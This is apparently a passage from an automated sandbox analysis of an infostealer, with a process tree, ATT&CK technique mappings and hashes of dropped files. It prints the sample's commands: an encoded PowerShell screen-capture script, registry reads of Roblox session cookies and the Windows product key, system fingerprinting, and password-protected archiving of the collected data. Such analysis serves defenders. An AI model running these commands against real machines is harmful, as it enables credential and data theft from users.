GkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:1584
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1352
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\u4re5dxn\u4re5dxn.cmdline"
        5⤵
        
        PID:1364
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD561.tmp" "c:\Users\Admin\AppData\Local\Temp\u4re5dxn\CSCFA43DABFB6FD49A2BEDBC613E043EE77.TMP"
        6⤵
        
        PID:5108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4104
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:2176
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2076
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2840
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:3760
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:3508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2920
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4888
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:2360
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2044
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:3544
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3360
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:2444
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:100
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:620
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:1312
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe a -r -hp"fin1" "C:\Users\Admin\AppData\Local\Temp\6CaGk.zip" *"
    3⤵
    PID:2528
  - - C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI32922\rar.exe a -r -hp"fin1" "C:\Users\Admin\AppData\Local\Temp\6CaGk.zip" *
      4⤵
      Executes dropped EXE
      PID:4944
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:900
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4012
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:3532
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3160
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:4864
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:4360
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3968
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:3196
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:3736
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3512

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 0c713bd740c7bb04e7faea6d4da00f07 mgSujQ1qjkKvG6cBtqEg5g.0.1.0.0.0
1⤵
PID:940

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\_MEI32922\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_bz2.pyd

Filesize
48KB

MD5
adaa3e7ab77129bbc4ed3d9c4adee584

SHA1
21aabd32b9cbfe0161539454138a43d5dbc73b65

SHA256
a1d8ce2c1efaa854bb0f9df43ebccf861ded6f8afb83c9a8b881904906359f55

SHA512
b73d3aba135fb5e0d907d430266754da2f02e714264cd4a33c1bfdeda4740bbe82d43056f1a7a85f4a8ed28cb7798693512b6d4cdb899ce65b6d271cf5e5e264

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_ctypes.pyd

Filesize
59KB

MD5
0f090d4159937400db90f1512fda50c8

SHA1
01cbcb413e50f3c204901dff7171998792133583

SHA256
ae6512a770673e268554363f2d1d2a202d0a337baf233c3e63335026d223be31

SHA512
151156a28d023cf68fd38cbecbe1484fc3f6bf525e7354fcced294f8e479e07453fd3fc22a6b8d049ddf0ad6306d2c7051ece4e7de1137578541a9aabefe3f12

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_decimal.pyd

Filesize
107KB

MD5
a592ba2bb04f53b47d87b4f7b0c8b328

SHA1
ca8c65ab0aab0f98af8cc1c1cf31c9744e56a33c

SHA256
19fe4a08b0b321ff9413da88e519f4a4a4510481605b250f2906a32e8bb14938

SHA512
1576fdc90d8678da0dab8253fdd8ec8b3ce924fa392f35d8c62207a85c31c26dae5524e983e97872933538551cbef9cd4ba9206bcd16f2ae0858ab11574d09e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_hashlib.pyd

Filesize
35KB

MD5
4dd4c7d3a7b954a337607b8b8c4a21d1

SHA1
b6318b830d73cbf9fa45be2915f852b5a5d81906

SHA256
926692fcecdb7e65a14ac0786e1f58e880ea8dae7f7bb3aa7f2c758c23f2af70

SHA512
dab02496c066a70a98334e841a0164df1a6e72e890ce66be440b10fdeecdfe7b8d0ec39d1af402ae72c8aa19763c92dd7404f3a829c9fdcf871c01b1aed122e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_lzma.pyd

Filesize
86KB

MD5
17082c94b383bca187eb13487425ec2c

SHA1
517df08af5c283ca08b7545b446c6c2309f45b8b

SHA256
ddbfef8da4a0d8c1c8c24d171de65b9f4069e2edb8f33ef5dfecf93cb2643bd4

SHA512
2b565d595e9a95aefae396fc7d66ee0aeb9bfe3c23d64540ba080ba39a484ab1c50f040161896cca6620c182f0b02a9db677dab099dca3cae863e6e2542bb12c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_queue.pyd

Filesize
26KB

MD5
97cc5797405f90b20927e29867bc3c4f

SHA1
a2e7d2399cca252cc54fc1609621d441dff1ace5

SHA256
fb304ca68b41e573713abb012196ef1ae2d5b5e659d846bbf46b1f13946c2a39

SHA512
77780fe0951473762990cbef056b3bba36cda9299b1a7d31d9059a792f13b1a072ce3ab26d312c59805a7a2e9773b7300b406fd3af5e2d1270676a7862b9ca48

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\_socket.pyd

Filesize
44KB

MD5
f52c1c015fb147729a7caab03b2f64f4

SHA1
8aebc2b18a02f1c6c7494271f7f9e779014bee31

SHA256
06d91ac02b00a29180f4520521de2f7de2593dd9c52e1c2b294e717c826a1b7d

SHA512
8ab076c551f0a6ffe02c26b4f0fbb2ea7756d4650fe39f53d7bd61f4cb6ae81460d46d8535c89c6d626e7c605882b39843f7f70dd50e9daf27af0f8cadd49c0f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-console-l1-1-0.dll

Filesize
19KB

MD5
815bd17033aa15f6937eff710101c784

SHA1
651f373b703cf3e02e77e26119a2a925ded509f0

SHA256
8f0188d00d062f3d650cb811607a64eb7a3b923397da473f38883d942f4f5184

SHA512
b836e6a83a21d32c2c61c98aae05490da2f77b8459c334e3959a02ec31639fb9ac190b53f08e2fa01a953e8c65038ed148f9fd4ea71b6369f7ef466c6ccfac54

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-datetime-l1-1-0.dll

Filesize
19KB

MD5
5e43b4314980eb7f19506613d4523e63

SHA1
fc2788632181476092a5cb4aa63ef57e4106703a

SHA256
daaacd2fdf366e2c36b42398e850412c8be3093e5b7a8f608684a656d27e4d6e

SHA512
acc730e49b6f59d0e76fdff10d16d89c46ec6a7002af6dfd15407af40813e92e585074bb4bcc71c2b8d7ea44c3e7abaeac7b8a877609de0fdb72324417d7cfea

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-debug-l1-1-0.dll

Filesize
19KB

MD5
6e84207402f5cd66e00abb1689ded080

SHA1
72559bedd082049c79f2b9fa59b7875a0ddd4551

SHA256
301a110ed905f10243437c5bc2a92cdf7c8609c19cb8baff92c99d8645c8d6f0

SHA512
58cc81404b88e133524d7c62b51f1c0ff9cfbf600e01b912e181529f03af74300a5fec98f85a7303e1dc6ce1ddba519b01b296db8a94a234884ca493567bcf0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-errorhandling-l1-1-0.dll

Filesize
19KB

MD5
8c717ad4c92fc26b40ec6830fd9289c7

SHA1
c5ed74b59bcdca1e26639c245900444b894aa06d

SHA256
c119a34d7ac08eccb645a85415b4abfa5a8fb05afe20838eb6ffb558f01657fd

SHA512
b734de4228232b423595bf87bf3b26a5297c6829a1ac976064dea30289e6bd646ff15d6daf40b6885480c9a58e80de31b429f2d233f6294b603e91f72e99e130

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-fibers-l1-1-0.dll

Filesize
19KB

MD5
2c2939389d78665ec3a34b1cfed44a8d

SHA1
c86a82c007be025baf8d02b15dc1d9277a1c49a5

SHA256
d4f607fbf213e9e036269574a904ab8868bba26fd42e4fb2c60a425f03934bdc

SHA512
698b6a4c036a1d812f82140fed33cb9039c8774aa75b0b63ec8122084b2fc5d24b99876c82b0207d2e8ee79c7ac5ac11029347fb1beec55282e72d528e179163

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-file-l1-1-0.dll

Filesize
23KB

MD5
3370535abeb8dc8ef37c2c5146d048f7

SHA1
b7a4d43b7948e93ded5b9a4a714ea69efd51cb26

SHA256
df372db5e119520d56f73c1733bdf7f6134c7209e375c7ba6a4c80f37565b35b

SHA512
75eb9a907af3b873787165589dd3505bf634c52e0826feb44f88019a6be385e4086d40f27330387497bda8f4917045833cd0859c8114f275f2416acfb8942608

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-file-l1-2-0.dll

Filesize
19KB

MD5
ac28edb5ad8eaa70ecbc64baf3e70bd4

SHA1
1a594e6cdc25a6e6be7904093f47f582e9c1fe4d

SHA256
fbd5e958f6efb4d78fd61ee9ee4b4d1b6f43c1210301668f654a880c65a1be86

SHA512
a25b812b9fa965af5f7de5552e2c2f4788a076af003ac0d94c3b2bc42dd9ab7e69af2438ce349b46a3387bf2bfcf27cec270d90ca6a44c9690861331c9e431e1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-file-l2-1-0.dll

Filesize
19KB

MD5
b5832f1e3a18d94cd855c3d8c632b30d

SHA1
6315b40487078bbafb478786c42c3946647e8ef3

SHA256
9f096475d4ba1533f564dd4a1db5dfeb620248fe14518042094b922539dc13e3

SHA512
f3016ded97591e25a6d4c70d89251a331402455ab589604e55c486fec37ee8e96bd1be2d4e4e59ba102dad696b3e1f754b699f9ebe8ae462e8b958ed2d431a5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-handle-l1-1-0.dll

Filesize
19KB

MD5
3486de24e09bc08b324c1c3e9e03b35c

SHA1
85743f027ace6e7da355c420ab162ad4a88c20b1

SHA256
1e7a0823130ca36e2f061ed8c40554ceb5faa906e10b6c042628e8ee6c776b4a

SHA512
053ed4bc2867fbed924b8ff47fba2cf4c302c9f95fedad8dca450b26509c0f6bfdc33e0d19b1afa3cd09e8c218228d0e3475df0200180acbbe97ee6a72482d2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-heap-l1-1-0.dll

Filesize
19KB

MD5
8d01d04941918b5d5ddaa4a9d4b1a8c6

SHA1
27b1c293b58cd6af9a951127612857018da482a6

SHA256
2c93dddf2fc65c99565d104a1078d663ebe590ecb74a47bc2ecf1b2e658574ac

SHA512
1d902a947c79e9d7157a32ca0a8ac6da25ee7726ac996f17e060ec6fdf5aee6d717e9e6ea3b0f4539dc3aea632e484082303537e17248a26f7ff1b1db9e4e796

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-interlocked-l1-1-0.dll

Filesize
19KB

MD5
a68eddda85e1c77ee3c316d05e215db0

SHA1
eef3809b52bdf0a8a42aa60040d1d0ec34b1c2aa

SHA256
d8e6d80a4fa4d0c3da6c179c551ce65f9e872db5625ae58b8bd69802c09c5d7b

SHA512
24c27a2894ac3ce764f0cb3225e80bf5f7637d3446b25a636917b4332814b9e7af9bdc8706ec6f8088529214367310a61df4bc2df4738ac06fec1f4e4a04e5d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-libraryloader-l1-1-0.dll

Filesize
19KB

MD5
cfb04fb6e6f578655b08a6d50054e4a5

SHA1
e9336808b24ebe24eff535f2a158ff65a693441d

SHA256
fb09d45296d3175e7cfcf5b0c284fe3bb3bfd5dea6e90c5c52c4f4c3aa1b0dc7

SHA512
1b9d752494f82075dc959b121dd0641418b5902a597c4427d792ffaea32f254cd7b5ee04f53cfaf20c36b5f0904242d6c0f2b67273ebac465aaa745d8daa470d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-localization-l1-2-0.dll

Filesize
19KB

MD5
fd59ee6be2136782225dcd86f8177239

SHA1
494d20e04f69676c150944e24e4fa714a3f781ca

SHA256
1fd044fdbc424779b01b79d477ee79dfbb508a04e86c62e1c8fc4f6d22f6a16a

SHA512
2250d54c3b9e6aeb2f5406e1428536564357a48ceab51596b33ff0843086fb420ad886af61725b25a58e2f50a4c17ddee10696d6041db9b60891eff8e495775c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-memory-l1-1-0.dll

Filesize
19KB

MD5
671bc514f0373f5775448215da9ecc19

SHA1
8a1ce5f0c482ff9b7adc9da0c4e7c5876df3dc57

SHA256
effb3bc6746e41e4139779aface86afc4e14454b95fc4a999dfdd07b03122a0f

SHA512
dad926d9046a73f46be7d52bc5df61ea7178f42ff18fcf57064d78d0f94bca4e7641cc467606891f69985b860e80ec028475ecefd17f3765763b51df256822fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-namedpipe-l1-1-0.dll

Filesize
19KB

MD5
ff505a3c725c068f0177d27e3def4707

SHA1
72e5942aaebf0e942d71d7f2231fcc2243ac165d

SHA256
5b93dc92eee5dcc91aaa2a479cfd989c41a8ffaeb29e92959a730e7a632dce1b

SHA512
072d6e1d843af90e19d356773317df491a06b952673ed34c7731242796ad647716e2c7544a4ca0ee37a1c7e738462973201d57f20fc57705db8b8e8061badd26

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-processenvironment-l1-1-0.dll

Filesize
19KB

MD5
83dd9755271b3e32e9ccc44602b170c5

SHA1
a7c3cd5b6c0cce5d85e666cb181d6a0247521cb6

SHA256
9b6f3d134547f882f476173a857a865dd9373c9befcfac0c324f1be673a2c9b2

SHA512
f41e644feebe5b41320f0272b2106e62d9f835f710e4035bbe15bcc997dfc6d503a5a946ba1f2437e3c149c095f7fade7a7929393a1821290a27c6859c70150c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-processthreads-l1-1-0.dll

Filesize
19KB

MD5
f3d59040c56520a117d3e7f0d4df50b0

SHA1
cde5fbc4cc283338bbc98b4c87ec21874369d98f

SHA256
6c2268cfc9b365e9683ed1f7b704d4fdc60938be8fcd2074ec3e1c35112b5785

SHA512
aba461363630ac9a429af794c9c43ad2ce23bafebb4902b5d40d370205fbe91dbf22a97aa4d355202d2d3c74721d3e6d547d84ac740ea24a1bdcbb8ee6a2c5b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-processthreads-l1-1-1.dll

Filesize
19KB

MD5
8ff0692d32f2fcb0b417220b98f30364

SHA1
5eeb1d781d44e4885284c8b535f051efca64aef8

SHA256
53cea73c248a49389bc2da01acac1d8e8022a7e034bcd522306e43a937200897

SHA512
f73249f70953c537da02b890308cb18a9c6676401975bf13aeb61b1db9dfa042e908c52ee266b404948a568b23b0cfb37ecd4b80379c398c15f56ce7a82cf7a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-profile-l1-1-0.dll

Filesize
19KB

MD5
59a815641390eeff6badaee84e8de7d0

SHA1
ca63e4696de7f5e913f942f1fd0b807959a8c972

SHA256
97f18741abb1d6d215503234b603755dec3d0e8d4c5f08060dababe7660a420d

SHA512
b91cedabc790aed85b9a1eed4241add1f73b1f890c1bb48efec750be7b59d44ca03d62cf1a011f23cdbf66bf80ef26ac01b7d8ef9e7ead3fa45306620aa1a056

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI32922\api-ms-win-core-rtlsupport-l1-1-0.dll

Filesize
19KB

MD5
3493376565524418af30afc7a97b0561

SHA1
abcfdcad703e05cbae97d004119b966920e04a5f

SHA256
8ed0ffbd5462ed7fa2a82efaa5f5de4cb3849699b6cf1be93ce5fe746ef7c58e

SHA512
